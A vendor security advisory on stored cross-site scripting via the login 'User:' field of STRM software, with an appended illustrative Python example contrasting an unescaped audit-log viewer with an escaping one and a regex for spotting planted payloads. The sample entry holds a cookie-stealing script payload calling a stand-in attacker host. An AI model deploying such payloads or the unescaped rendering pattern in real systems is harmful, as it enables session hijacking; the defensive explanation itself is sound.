Script Insertion Vulnerability Via STRM "User:" Prompt

Article ID: JSA10437 SECURITY_ADVISORIES Last Updated: 09 May 2013 Version: 1.0
Legacy Advisory Id:
PSN-2010-05-758
Product Affected:
This is a "zero day" issue which affects any STRM product running a vulnerable release of STRM software.
Problem:
Input supplied at the "User:" prompt on the login page is not sanitized correctly when it is logged to the internal audit trail. If the input contains correctly composed, executable content (a stored cross-site scripting payload), it is executed in the context of whichever user later views the associated log entry, for example while reviewing the audit trail on the device. If that user is the administrator, the content may be executed with root privileges. An attacker could therefore submit a specially crafted script at the "User:" prompt and have it executed by a privileged user at some indeterminate future time, when that user views the resulting log entry.

All STRM platforms running any 2008.* software version earlier than 2008.3 patch 530 are affected. All 2009.* series releases and later versions are NOT affected.
Solution:
All software releases in the 2008.* series built on or after 2009-08-18 have been fixed for this issue. Releases containing the fix specifically include 2008.3 patch 530, 2009.1, and all subsequent releases.

This issue is being tracked as "STRM PR 6692". The PR is not viewable by customers but the label can be used for reference when discussing the issue with JTAC.

KB16765 - "In which releases are vulnerabilities fixed?" describes which release vulnerabilities are fixed as per our "End of Engineering" and "End of Life" support policies.

Workaround:
No known workaround exists for this issue. Care should be taken when reviewing logs and audit trails, especially when logged in to an account with administrative privileges, since a planted entry is only executed when it is viewed. Customers are urged to upgrade to a fixed release of the software.
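The fault described in the Problem section, and a triage step that fits the workaround advice, as an added example that is not code from STRM or Juniper: a small Python audit-trail viewer showing the vulnerable rendering pattern beside a hardened one, plus a scan of existing entries for script-like "User:" values so an operator can tell whether a payload has already been planted before a privileged user opens the log. The log format, field names, function names and the sample entries are all constructed assumptions for illustration.

```python
"""Stored script insertion via a logged login name: vulnerable vs. hardened
rendering, plus a triage scan of an existing audit trail.
Everything here is an illustrative assumption, not STRM's own code or format."""
import html
import re

# Constructed audit-trail entries: one benign failed login and one whose
# "User:" value is a script payload of the kind the advisory describes.
# The trail stores the submitted value raw, as the advisory implies.
AUDIT_TRAIL = [
    {"ts": "2009-08-17T10:00:00Z", "event": "login-failed",
     "user": "alice", "src": "10.0.0.5"},
    {"ts": "2009-08-17T10:00:07Z", "event": "login-failed",
     "user": '<script>document.location="http://attacker.invalid/?c="'
             '+document.cookie</script>',
     "src": "198.51.100.23"},
]

FIELDS = ("ts", "event", "user", "src")


def render_audit_row_vulnerable(entry):
    """Vulnerable pattern (hypothetical viewer): the logged user name is
    interpolated into the HTML the reviewer's browser renders without any
    output encoding, so script stored in the trail runs with the session and
    privileges of whoever views the entry."""
    return "<tr>" + "".join("<td>%s</td>" % entry[k] for k in FIELDS) + "</tr>"


def render_audit_row_fixed(entry):
    """Hardened pattern: every logged field is HTML-escaped at the point of
    output. The raw value is still kept in the trail for forensics; only its
    rendering changes, so '<script>' becomes inert '&lt;script&gt;'."""
    return "<tr>" + "".join(
        "<td>%s</td>" % html.escape(str(entry[k]), quote=True) for k in FIELDS
    ) + "</tr>"


# Markup that has no business in a login name. This is a triage heuristic for
# an operator scanning an already-collected trail, not a sanitizer: the fix is
# output encoding (above) or upgrading, not rejecting these strings on input.
SUSPICIOUS = re.compile(
    r"<\s*/?\s*(script|img|iframe|svg|object|embed)\b"  # active HTML elements
    r"|javascript:"                                     # script URLs
    r"|\bon\w+\s*=",                                    # inline event handlers
    re.IGNORECASE,
)


def find_suspicious_entries(trail):
    """Return the entries whose 'user' field looks like script or markup, so
    they can be reviewed from a non-privileged, text-only context first."""
    return [e for e in trail if SUSPICIOUS.search(str(e["user"]))]


if __name__ == "__main__":
    for e in AUDIT_TRAIL:
        print("VULNERABLE:", render_audit_row_vulnerable(e))
        print("FIXED:     ", render_audit_row_fixed(e))
    for e in find_suspicious_entries(AUDIT_TRAIL):
        print("suspicious User: value from", e["src"], "at", e["ts"])
```

The triage scan is deliberately a review aid rather than a filter: encoding on output neutralises any stored value, whereas input blacklists of this kind are routinely bypassed, so the scan only tells an operator which entries to inspect with a plain-text tool before opening the audit trail in a privileged session.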
Implementation:

How To Obtain Fixed Software:
STRM Maintenance Releases and Patches are available at http://support.juniper.net from the "Download Software" links.
CVSS Score:
7.3 (CVSS v2 base score; vector AV:N/AC:M/Au:M/C:C/I:C/A:N/E:F/RL:W/RC:C)
Severity Level:
High
Severity Assessment:
Information for how Juniper Networks uses CVSS can be found at KB 16446 "Common Vulnerability Scoring System (CVSS) and Juniper's Security Advisories".
